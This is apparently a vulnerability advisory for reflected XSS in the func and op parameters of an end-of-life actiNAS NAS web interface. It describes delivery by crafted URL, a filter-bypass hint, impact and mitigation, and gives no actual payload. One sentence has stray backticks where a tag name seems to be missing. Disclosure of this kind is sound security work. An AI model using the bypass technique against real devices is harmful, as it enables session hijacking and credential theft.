CVE-2023-51946

Vulnerability

Multiple reflected cross-site scripting (XSS) vulnerabilities exist in nasSvr.php of actidata actiNAS-SL-2U-8 running firmware version 3.2.03-SP1. The vulnerable parameters are func and op, which reflect user input into error messages without proper sanitization. The product is end-of-life and no longer supported [1][2].

Exploitation

An unauthenticated remote attacker can exploit this by crafting a malicious URL containing XSS payloads in the func or op parameters and tricking a victim into clicking it. The application modifies payloads that include whitespace between string delimiters, but this can be bypassed by using a ` tag with a src` attribute or by omitting whitespace between delimiters [2].

Impact

Successful exploitation allows arbitrary JavaScript execution in the victim's browser, potentially leading to session hijacking, credential theft, or defacement. The attack does not grant server-side access or privilege escalation [2].

Mitigation

The affected product is end-of-life and no patch is available [1]. Users are advised to migrate to a supported model, such as the actiNAS DX6 product family [1]. No official workaround has been provided; however, input validation or WAF rules could mitigate exploitation [2].